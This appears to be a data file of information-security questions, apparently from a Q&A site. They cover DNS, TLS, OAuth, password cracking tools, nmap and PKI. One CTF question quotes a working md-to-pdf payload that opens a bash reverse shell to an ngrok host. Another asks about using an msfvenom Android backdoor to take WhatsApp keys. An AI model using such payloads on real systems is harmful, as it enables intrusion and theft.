instruction
stringlengths
24
29.9k
This is a follow-up to my previous question. My ISP is apparently trying to redirect my DNS requests. When I visit some sites, my traffic is redirected to other IPs and not the intended site. I tried DoH, but my ISP blocks DoH. And even when I set my primary and alternative DNS to 8.8.8.8 and 8.8.4.4, it does not help ...
I would like to obtain a list of malicious URLs for testing purposes and, if possible, would like to collect URLs of sites that exploit zero-day vulnerabilities. I want to collect malicious URLs to investigate zero-day attacks.
Recently helped a friend after their website was hijacked via a compromised (and very simple) hosting and cPanel password. The site was just static html and css, showing business hours etc and contact details. No accounts, personal data or anything really to target. The entire contents of the site remained, just with ....
I may be wrong, but for security reasons, in REST APIs the login credentials are always sent with the content type application/x-www-form-urlencoded. But I haven't seen the same with user registration; the data is normally sent as JSON. Why wouldn't you use application/x-www-form-urlencoded for both registration and lo...
For android phones in India can police get a phone's IMEI number just by using that phone's number? also suppose if a phone was moving around within few miles radius for few days and it was turned on several times in that duration. But now the phone is turned off permanently and only after phone is turned off police ...
Recently, I happened to notice that a site I was looking at had different certificate providers for different subdomains. Whilst looking around, I found that seems to be somewhat common (or at least not rare). Whilst I understand the logic for having different certificates for different subdomains ( see Why one may wan...
During local development of our website we need some features that are restricted to secure contexts, meaning we need a self signed certificate for 'localhost' for some things to work. To make things as easy as possible for new developers to spin up a local development server, I've created a script that creates a new c...
I am trying to brute force the brute force log-in page on DVWA v1.0.7 (/dvwa/vulnerabilities/brute/) I have been working on this for quite some time but I keep getting a bunch of false positives when I use a wordlist I created and when I use the rockyou.txt.gz file, hydra just keeps going on and on without any results....
I'm looking for a way to encrypt data in MySQL database securely. The data come from a web interface from a POST form and each POST request from the user insert a new line in the database. Right now, I am trying to achieve this from my PHP code with the functions openssl_encrypt and openssl_decrypt but I'm not sure if ...
I'm not understanding how does Sendgrid verify that's it's me who's sending them the HTTPS request on their webhook endpoint. Specifically, in their docs they show how to obtain their public key (to verify that I'm connected to sendgrid) but do not show how to upload my public key to verify my signature. I suspect that...
I'm trying to figure out the best approach to store some information into a DB that will only be accessible by specific users through a password. So let's say I've got user X that stores something into the DB. That information is password encrypted and only once he enters the password can view the encrypted fields. Any...
I'm using John The Ripper for password cracking and adding new users/passwords to test it out. When I create a new user and password, the hash starts with $y$ which is from yescrypt. When testing a new password cracker - hashcat - it apparently doesn't support that format. Is there a way to change the hash method whe...
Integrated Security I have a ASP.NET web application with connection strings and other secrets to protect in production. Ideally I would like to use IntegratedSecurity to keep SQL credentials out of the connection strings, but IIS Express uses my personal logged in windows account to authenticate with IntegratedSecur...
Buying an international web domain (so there is no national law to expose its details beyond the domain registrar) Not putting any personal and family name in the website What else?
Personally, I think that it's not so important to check the strength of the passwords on server-side, since, if the user evades the validation on the client side, it would be their responsibility to use an insecure password; however, I don't know if this is a correct practice.
Does i need vpn to update/upgrade packages on fedora or debian if https is configured in sources file ? Can packages be replaced by malicious ones through wifi attacks like fraggattacks ?
I have Avast pro for my Samsung. I searched the whole app but I cant find the option to exclude/whitelist an app or file from scanning. Is there such an option for android? I looked through their website and only for PC they have the option to exclude scanning. They don't have a guide for android and I cant seem to fin...
As far as I know, the IP address of any website is detectable by a simple ping test. Say I host several websites on a given webhost with a single IP. If someone finds out the IP of one of my websites, could this person find all other websites sharing the same IP and if so, how?
Is there any way to get into the root file system in android with an already installed msfvenom apk in reverse_tcp (to get the whatsapp encryption key)
Logwatch shows those attacks giving a 500. Given that 500 is an internal server error, does that mean I need to examine further or dismiss? 421 (undefined) /: 4 Time(s) 500 Internal Server Error /: 1131 Time(s) /robots.txt: 67 Time(s) /.env: 11 Time(s) /ab2h: 4 Time(s) /?XDEBUG_SESSION_START=phpstorm:...
There are different scenarios when it's about secure computation/storage on mobile devices, e.g., "REE only", "REE + TEE", or "REE + SE" or "REE + TEE + SE". REE - Real Execution Environment, i.e. default OS (e.g., Android) TEE - Trusted Execution Environment: secure area of CPU, isolated from REE SE - Secure Element: ...
Somebody tried to make a purchase with my debit card at a Walgreens in another part the state of I live on.I was notified of the purchase attempt via my bank's fraud detection system. However, I have my debit card with me. How could that be possible? I want to know so I can protect myself from this in the future.
I want to understand the process to go from a security bug report to a running system having the bug fix applied. Especially how long it takes from the bug being public until the bug is fixed on the running system. I heard it only takes 1 hour from a bug being public until hackers use exploits to attack running systems...
Some time ago I read an article that mentioned that it is possible for some ransomware to change the magic numbers of a file (that makes sense). However, the authors claimed that their method was better, because they calculated the entropy value of the file header and used that to distinguish between encrypted and beni...
I have been thinking about how to store my master passwords (password manager, email and device passwords) for quite a while and I just haven't been able to come up with a satisfying solution yet. I really want to avoid having outsiders gain access to my data, but I also really want to avoid my data being lost for me o...
I want to recover a zip password using hashcat. hashcat requires the hash of the desired password. In order to obtain it, I have tried using zip2john using: sudo zip2john /home/kali/Desktop/myfile.zip > hash.txt It works and outputs a hash. This hash however is not accepted by hashcat. hashcat responds: Token length e...
The primary secret key should be stored offline and only be used for creating/signing keys. There will be at least two secret keys: one primary key or subkey for signing, and one subkey for encryption; there might be a third key for authorisation. Any of these keys has a fingerprint, which would be displayed in either ...
I am using John the Ripper jumbo release on Windows: 1.9.0-jumbo-1 64-bit Windows binaries I am told that there MIGHT be 2 different passwords in the zip file. To avoid problems, I should pick only 1 file. To do that, I should use the -o option. If I use the following... zip2john.exe myfile.zip -o vooab.vtv > hash.txt...
I am testing a website that allows content fetch only when you access it from an IP a certain Wi-Fi network. However if you want to access the website from different network, you get the response of {"error":"IP access failed."} I want to test to see if someone can still access the website if they spoof the network's I...
From my research, it sounds as though a root certificate store is completely managed by your operating system. Which is to say, if I install software, or updates to the OS or browsers (or anything possibly) then my root ca store can be updated with new trusted roots. Assuming i am running as sudo, root, or admin on win...
When somebody wants to find out a password by using its hash, he can use for example John the Ripper. Then he runs the application for days or weeks or years, hoping to somewhen guess the right result. All the negatives (not working attempts) are simply discarded. Why do we not store them in a sorted database? For exam...
How to determine BPFdoor entrypoint?I used following link to detect it on host https://blog.qualys.com/vulnerabilities-threat-research/2022/08/01/heres-a-simple-script-to-detect-the-stealthy-nation-state-bpfdoor but couldn't determine any specific entry point or C2 IP
Our program encrypts the message with RSA 1024 public key A (from specific pair A-B). Then the program sends the encrypted message to the server. The server maintains a list of public-private key pairs {An-Bn} and the server iterates over this list of pairs and tries to decrypt the received message by every private key...
I have used zip2john to get the hash for a zip file like that: zip2john.exe myfile.zip > hash.txt john told me: ver 2.0 myfile.zip/SomeDir/SomeFile.itv PKZIP Encr: cmplen=11813, decmplen=20364, crc=9CA2F026 ver 2.0 myfile.zip/packageInfo.plist PKZIP Encr: cmplen=390, decmplen=433, crc=5B49A74F Note: It is assumed tha...
Let's say I have generated 16 integers (between 0 and 128) using Python from random import seed, randint seed(1234) randoms = [randint(0, 128) for _ in range(0, 16)] If we have a rough knowledge of the seed (its number of digits for example), is it physically possible to retrieve the seed of the random generation with...
My company has one SSO provider that we use for our back office apps. We're looking at tightening security for our SaaS offering. We have a fork in the road for implementation - we can either continue using non-SSO (Spring Security) and enforcing prod and dev to have different credentials, or we could use our SSO pro...
Is there a way to prevent a port from being discovered by nmap? I found that port 1433 is still being flagged as "open" when using the following command: nmap <ip_add> -Pn -p1433 or nmap <ip_add> -Pn However, it's not detected if I don't use -Pn and instead have just nmap <ip_add> -p1433 Is there anyway to prevent t...
I have created a ECDSA key and now need to convert this to SSH2 key. final KeyPairGenerator keyGen = KeyPairGenerator.getInstance("ECDSA"); ECGenParameterSpec params = new ECGenParameterSpec("secp384r1"); keyGen.initialize(params); final KeyPair keyPair = keyGen.generateKeyPair(); //format publicKey in ...
Suppose we have access to SAM and SYSTEM file, I want to decrypt the password. I'd like not to use any third-party software and write my own algorithm. Is there a way to do so?
I am looking for hardware TOTP system-on-chip, where it would not be possible for an adversary to extract the shared secret (TOTP seed in other words). I am researching an application, where one same seed has to be used in large number of hardware tokens for a long time. The closest I could find is a chip for biometric...
in the CRS v3.3.3 update, some Content-Types allowed in rule 900220 were removed and explanatory comment added, but it generated a doubt when I saw that text/plain was removed from this list. Why not allow text/plain by default in Content-Types ? I ask because apparently many simple apps use text/plain CT. n my underst...
When running Recon-ng after setting every option correctly, I'm getting the following error Traceback (most recent call last): File "/usr/share/recon-ng/recon/core/module.py", line 342, in do_run self.run() File "/usr/share/recon-ng/recon/core/module.py", line 336, in run self.module_run(*params) File "/h...
This is a slightly tough one to explain with my current experience, lacking mainstream terminology. But here goes. I have an encryption/security model whereby I do not store users plaintext passwords. It's pretty simple actually: 1 - on sign up users plaintext password is hashed with one algorithm, this hash is stored ...
I want to install curl and openssl packages in a Docker image based on Alpine Linux that I use in production. These packages will help me with debugging SSL certificates and HTTPS connections in my Kubernetes setup. I know that Alpine Linux is built with security in mind. Therefore, I wonder if I will compromise the se...
I am working on some research and I am trying to unpack exactly how NotPetya used the eternalblue vulnerability to spread across networks. My understanding of the SMBv1 Protocol is that it would not be used to communicate outside of a LAN network. I understand that many of the NotPetya victims used an infiltrated accou...
It used to do a Google search. Now it redirects to this weird website, which itself redirects to Yahoo. What gives? https://find.fnavigate-now.com/results.aspx?q=test&gd=SY1004294&searchsource=58&d=070120&n=9998
If we're doing sensitive things in the browser, like logging into cryptocurrency exchanges, is it too risky to have any browser extensions, for fear that there's a virus or something in them?
I have been using a VPN with my camera for about a year and everything worked perfectly. Recently my VPN subscription expired. I renewed my subscription but now I cannot view in the surveillance mode on my IPad. If I turn the VPN off everything works perfectly again. I can still view new video clips just no surveillanc...
I understand that oauth is an Authorization protocol, but it is possible to use it for authentication when clubbed with something like open ID Connect. I am trying to understand why do we need an extra token in the redirect url to prove authentication. This article presents some good points about why the possession of ...
Details I have an application running behind an Azure Web Application Firewall (WAF) on an Azure Application Gateway (AppGW) that was previously on an on-premises server. Since moving it to Azure, users and testers are now getting 403 Forbidden when attempting to send data to the service. I believe these are seen by th...
I've had a look within the official TLS specification but I cannot see any mention of this. Does TLS allow compression to be disabled? Or is it mandatory?
If a dependency that is used in development environment or at build time has a security vulnerability, could it cause a security threat for the application? I'm looking for an example to understand how it can have an impact on the security posture of the application.
Excuse my ignorance. I'm just a beginner trying to fill in the knowledge gaps that I have on how email system in general works, so this might seem a silly question to some or even all of you. Is there a possibility that an email comes from an illegitimate sender despite passing spf, dkim and dmarc? I know the answer he...
Say I have a game, when you finish playing you put your name in and your score is synched with a public scoreboard. Assume also that I own the server and its code. How can I verify that the scores received by public clients are legitimate and not fake? Malicious use-case: I play the game, then I open burp and capture t...
I'm trying to figure out how secure a host firewall is, hence the question in the title. I read that many firewalls allow outbound connections to port 80 to allow browsing, would that be enough for the malware to communicate to the controller? would it be possible with tunneling? This would allow me to carry with HTTP ...
We need to give local admin privileges on most workstations to our ERP software admin so he can install updates. He is not a domain admin, simply a domain user. However, we don't want him to have local admin rights to any management computers, just staff. How do we correctly proceed?
Let's say the Content Security Policy looks like this: Content-Security-Policy: default-src 'self'; It's also not possible to upload JS files on the same origin. Now there's an exploit to write arbitrary HTML on a page, including <script>. But <script> among other tags can't execute any scripts because of the CSP. Whe...
Best practices say that when users choose a password (at signup or when changing an existing password), the application should reject that password if it appears on a list of passwords known to be unsafe. For example, NIST Special Publication 800-63 from 2017 says the following (emphasis mine): When processing request...
I'm currently trying to generate a very specific word list. The words generated should go like this: crunch 9 9 -t @%%%%%%,,-o test.txt But one of the constraints that I have given myself is that the numbers generated shouldn't go above a certain number, for example z092348ZZ. Where the first two digits shouldn't go a...
Our annual penetration test result came back and this time around, one finding was reported: Our line-of-business Android App is vulnerable to memory dump attack. The specifics of the method that were used is a bit obscure because it was down by external contractor who weren't willing to disclose anything beyond their ...
I was learning about SCRAM and liked its ability to protect against various attacks (as mentioned in this MongoDB blog post), specifically: Eavesdropping - The attacker can read all traffic exchanged between the client and server. To protect against eavesdropping, a SCRAM client never sends the password as plaintext o...
The scenario is: I am running a test webpage with apache2 with the beef hook embedded on a kali box (VM) My router has a port forward set to the IP address of the VM and forwarding to the port on which apache is hosting the page. The router does have a static IP address, but for some reason, the beef-xss hook does no...
I got these emails from a spammer to my inbox, I am not sure if these are phishing attempt. I can't tell. Click on one of them, I see this I checked the codes behind that mail, I see smtp.mailfrom=YbAilGJazUvJpYoYlVS.cnrpxfkfvvmetdifzxgiyzrzc.fmfsruwjpipssifktxyexpnyatvsymfoz; If I open those emails but do not click...
Our school uses LanSchool Air and content keeper. I found a way to disable both. I have already gotten my Chromebook taken away for "abusing Chromebook privileges" I think this is a major flaw that should be fixed. How should I tell the school?
Many websites and/or web apps require you to validate the e-mail address after registration. Why don't we first validate the email address and then continue with the registration? Is there something wrong with a person first providing their email address, getting a validation email, going to the URL send in the email a...
I've recently gotten into web security and javascript and I think this looks like apretty promising DOM XSS: let hastagIntentos = 0 , posAnterior = 0 , reintentosHatagPos = 0; function enlacesParciales() { if (window.location.hash.length > 0) { let c = $(window.location.hash); hastagIntentos++, ...
In https://datatracker.ietf.org/doc/html/rfc8252 (summarised well in https://auth0.com/blog/oauth-2-best-practices-for-native-apps) it states that there are a number of options for a native application to register a redirect uri, including loopback and "custom uri schemes". While I understand how the PKCE mechanism pro...
I have a device and I am trying to port scan it. I did the basic nmap -A -p0- 192.168.0.x but I am just getting 0/tcp filtered unknown so I don't think it is working. The device works on p2p so I am thinking that is why it may not be working. I read that p2p does not use ports but I don't even know how that works or is...
I tried sniffing TLS web traffic on my own network and I always run against the following complications: I need to install an additional root cert on my devices I need to root my phone to do certificate pinning bypass For a government this is even harder, isn't it? I have hard time believing that everyone's phone ge...
is there a possibility to create a 2-Tier PKI with multiple CA's for redundancy? The scenario would if, if CA1 becomes unavailable, CA2 could be used to verify certificates and/or the complete certificate chain.
I was wondering if it is possible to combine SAML 2.0 SSO with QR Code scanning or fundamentally it is not possible? If a session exists in one device the user can scan it with her chell phone and login instantly. Something similar is found in applications like Discord, Viber etc. Is it also safe or it has security dra...
i'm using latest version of microsoft edge browser on windows 10 PC and i'm in India. I use cloudeflare DNS. i Checked my browser security on https://www.cloudflare.com/ssl/encrypted-sni/ and got this result - So can my ISP know which urls i'm visiting? not just starting domain like "example.com" but full url like- "e...
I've been reading about security classifications, and have a fundamental question I can't seem to find an answer to. Why does the designation Sensitive But Unclassified (SBU) exist? Why not just classify it? I can guess it may have to do with volume, but I don't know for sure. Each classified document has some sort ...
Can we use 10 digital TOTP as client_secret? What security problems would this do, and maybe some benefits? After all, TOTP changes every 30 seconds, but you need to know e.g. a 32 byte secret (which will never be sent across any request) to compute it. Is it a good idea?
These days I'm reading this Facebook engineering article Scalable and secure access with SSH. Most of the article makes sense to me but I am not experienced enough to understand the paragraph about bastion hosts: Security domains ... In our infrastructure, engineers don't have direct SSH access to production systems, ...
can my Isp read my emails or see whom I send emails or receive emails from? i use rediffmail.com, Gmail and outlook.com for emails. All are https and I use cloudeflare dns.
I'm a pentester and this is my first question here. I've managed to circumvent the ssl certificate pinning implementation on a few mobile apps. Frankly, the applications I test are critical bank applications and I can listen to the traffic passing through these applications. Do you think I should post this as a vulnera...
If my main intention is to hide whatever I do on the internet from my ISP, then which VPN connection should I use; TCP or UDP? Or if I need to do anything more for that purpose please tell me. Also how to properly configure a VPN to get maximum anonymity from my ISP? I use OpenVPN version 3.2.0 and use the configuratio...
There are 3 different web apps: X: A resource provider that provides details about a user (implements authorization part of openid protocol). Y: Web service (implements openid client) that gets the user details from X Z: Web app that wants to use the user in its app logic. I understand, that it would be better to not h...
I let the app run since around 2 days. The app tells me to press q to quit and any other key to show the status. I do that from time to time. However, I do not understand how to read what I am seeing. I expected the string to get longer and longer, but - as I understood it - their lenghts vary. I am also confused becau...
I need to convert a ton of directories of JPEGs into PDFs or EPUBs. So I downloaded this: https://ci.appveyor.com/project/josch/img2pdf/build/artifacts Being scared that it might be malware, as any EXE can be, I uploaded it to VirusTotal. It gave this result: https://www.virustotal.com/gui/file/cb85a4ce88ee138bc5895d70...
I need to hash 32 cryptographically random bytes, but later the verification the value with hash must be very fast, so I decided to use SHA256. Is it a security issue if my passwords are 32 cryptographically random bytes? Maybe you know some other fast and secure hashing algorithm?
Okay, I know it might seem this has already been beaten to death but, hear me out. I am including a fairly good password strength algorithm for my app for users on sign-up. This one, which I've copied (with minor adjustments). I also want to give a ROUGH metric in addition to the strength tester. I want to calculate an...
Client A is connected to the public internet. Client B gateway address is connected to the Client A's network interface. Client B is running a Web browser which is sending requests to 127.0.0.1:1234 HTTP Proxy, which encrypts and sends the packets ahead to Client A's machine then to -> ISP -> Public Internet. By what...
I was doing some security checks in some devices in my local network and I noticed that I obtain two different certificate chains for the same domain (www.google.com) from two different devices (smartphone and desktop pc, again both connected to same network). Chain in desktop: ################ CERT 1 ################ ...
When I add a second origin header it is added to the Access-Control-Allow-Origin response header but it adds it with the main domain. Example: I intercept the request in burp suite and add this: Origin: https://wwww.attacker.com Origin: https://www.target-domain.com The response: A...
In the CSAW 2022 web challenge, called "my little website", a youtuber in this video used a vulnerability in md-to-pdf to run arbitrary js, and this is the payload used: ---js ((require["child_process"]).execSync("bash -c 'bash -i >& /dev/tcp/2.tcp.ngrok.io/13091 0>&1'")) ---RCE as a comment on the video states, expla...
As we can see on this page, BLAKE-3 is about 14 times faster than SHA-256. Is it as safe as SHA-256? I would like to use it for my passwords which are 32 cryptographically random bytes, because my API uses application-layer encryption which slows down the response anyway, and I don't want to be too vulnerable to DDoS a...
I am currently running argon2id of hashing function with below parameters on my IphoneXS: Iterations: 8, Memory: 64MB, Parallelism: 8, HashLength: 32, These params allow hashing time to be less than 1s. So is there a formula to calculate the argon2id parameters? I want to find the optimized parameters. Should I favor I...
Advanced types of Ransomware generate, usually, an AES 128 bit key (used to encrypt files, some types of ransomware use a unique AES key for each file). This key is generated on the fly. In addition, the ransomware generates a client RSA 4096 bit public/private key pair (again on the fly).The Cpub is used to encrypt th...
I recently purchased a fairly sleek LED lamp. Like most new-fangled furnishings it comes with a pile of unnecessary features including bluetooth, wifi, and a mobile app. Hence my new-found paranoia. I hate connected devices, but I've long taken comfort in that I never connect these devices to the internet. This morning...
A number of articles suggest removing insecure (broken) SSH key types in order to have a more secure server. In practice, if I only connect to the server with secure key types, why should I bother deleting insecure key types? What is a practical attack that can be performed if I do not remove these key types. From SSH ...
The demos I've seen for Passkey assume that any public user can register with a website. What about the situation where you want to set up a passkey for an admin user of a website? i.e. How does an admin create a new Passkey on their device and send the public key to an administrator to add to their account?
This server hardening guide suggests re-generating the RSA and ED25519 host keys. What is the advantage of re-generating the default key?
In an OAuth2 authorization flow, if I understand correctly the request made to receive a token with PCKE is almost identical between that of a public client and that of a confidential client. The only real difference is that a confidential client will also send along the "client secret" while a public client does not b...
Is there malware that can run from a simple download from the internet autonomously without user interaction/initiation? I know there are worms that can do that, but I assumed they needed to be opened or maybe interacted with subtly maybe through different apps. If so what is the malware that can do this and how do the...
I have a very old 256 MB SD card (purchased around 2004). The SD card is still working, but some old photos are missing due to a possible unintentional format action on my digital camera. Is there any way to recover the data on it?
In short, I need to place a Digital Signature into slot 9c of my Yubikey. If you generate the certificate from the Yubikey; then the private key is not exportable. So I'm attempting to generate the pfx file from the computer itself so that I can import into multiple keys without the need for multiple different certific...
I have an Java client program for Windows having a properties file that I need to be able to encrypt (protect it if a malicious user accesses the server and properties file) but the client program of course needs to be able to read it (even when server offline). I am considering the DPAPI to encrypt the secret key, or ...
Entropy/Length/Complexity of a password is pretty straight forward and cant really vary much. For Dictionary Similarity, i would assume that a software just checks how many characters in a password would need to change to match any Dictionary password, or e.g. if moving all letters forward / removing dots / changing nu...